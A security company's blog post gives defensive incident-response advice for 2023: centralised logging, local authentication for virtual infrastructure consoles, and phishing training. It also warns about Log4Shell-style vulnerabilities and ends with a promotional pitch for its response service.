Our Incident Response Team has had another busy year as organisations fell victim to a wide range of cyber attacks and incidents. In this blog we cover the top 3 things our team thinks organisations need to consider as we head into 2023.
While each cyber incident is unique there are patterns that emerge and common issues that are discovered. A lot of the time organisations inadvertently make the incident response teams job harder.
One example is where an organisation has multiple security tools such as firewalls in place. One firewall could be covering 60% of a network the other 40%.
All well and good you may think but when it came to finding out how an attacker got in it is then difficult to build a picture due to shifting through the logs of two different firewalls. A very time-consuming process and a task that can slow down an incident response greatly.
Which leads nicely into our first consideration.
Extensive Centralised Logging is a must
When the worst does occur the incident response team needs to be able to access accurate information.
Logs provide a trail of system activities, events, or changes in an IT system. They can help troubleshoot system functionality issues, performance problems, or security incidents. System logs are used to determine when changes were made to the system and who made them. Additionally, logs are often necessary for regulatory requirements.
For forensic investigations for example, extensive centralise logging of security event logs and backups is crucial in order to determine when and how an attacker gained access to an organisation’s systems.
“Retention of this logging should go back at least 2 years. At almost every incident that we are sent to investigate the organisation has a lack of logging which makes our job more difficult. Having logs that go back a reasonable amount of time can provide us with vital clues as to how and when an attacker made their move as well as showing us what exactly was compromised,” says Integrity360’s Cyber Threat Response Manager Patrick Wragg.
Locally Store Virtual Infrastructure Authentication
We cannot stress enough the importance of storing your organisation’s authentication for managing virtual infrastructures locally and NOT via Active Directory or Lightweight Directory Access Protocol (LDAP) methods.
It is now pretty trivial for an attacker to compromise domain based credentials as they are easier for an attacker to reach than you might think. Active Directory makes an irresistible target for attackers as they are the first place they look to find stored passwords, usernames, permissions and more.
Domain-based authentication (such as Active Directory or LDAP) for virtual infrastructure management consoles such as ESXi should be avoided if possible.
Once the attacker gains access to the organisation's Domain Controller which is often the goal, they can then unleash ransomware on entire virtual machines/file stores rather than just file servers and employee workstations. If a company has an application server running on a virtual machine, this would be crippling because the entire application becomes unusable, rather than all of the files stored on it.
We recommend using local authentication only where the credentials are stored in a secure password manager solution.
Increase your Phishing Awareness Training for Employees
Phishing remains the most prominent method attackers use to gain initial access to an organisation’s networks and systems. Human error accounts for the vast majority of successful cyber attacks so training employees in what to be aware of when it comes to phishing and social engineering attempts is vital.
The best and most effective way to reduce the risk posed to your organisation is to run regular cyber security phishing tests to help your employees learn what they should keep an eye out for. After all the only thing that can combat human nature is awareness and training.
What’s the Biggest Cybersecurity Risk in 2023?
Last December, a zero-day critical vulnerability was discovered in the Apache Log4j2 Java-based logging library. This vulnerability now known as Log4Shell is an unauthenticated remote code execution (RCE) flaw that allows for complete system takeover with Log4j2.0-beta9 up to 2.16.1.
A patch for the vulnerability was released the same month but that didn’t prevent many businesses and organisations falling victim to it as attackers exploited it to steal data, credentials and install ransomware, crypto miners and other malware.
Organisations that fail to regularly carry vulnerability assessments and/or have no patch management policies in place are still exposed to this threat.
As we head into 2023 it is inevitable that another log4shell type vulnerability is discovered. This is what we believe to be the biggest threat as we head into the New Year.
A Proactive Incident Response management service gives you access to our experienced Incident Response Team (IRT) who can quickly recognise and contain the threat, reducing your response time and minimising the impact. Get in touch to learn more.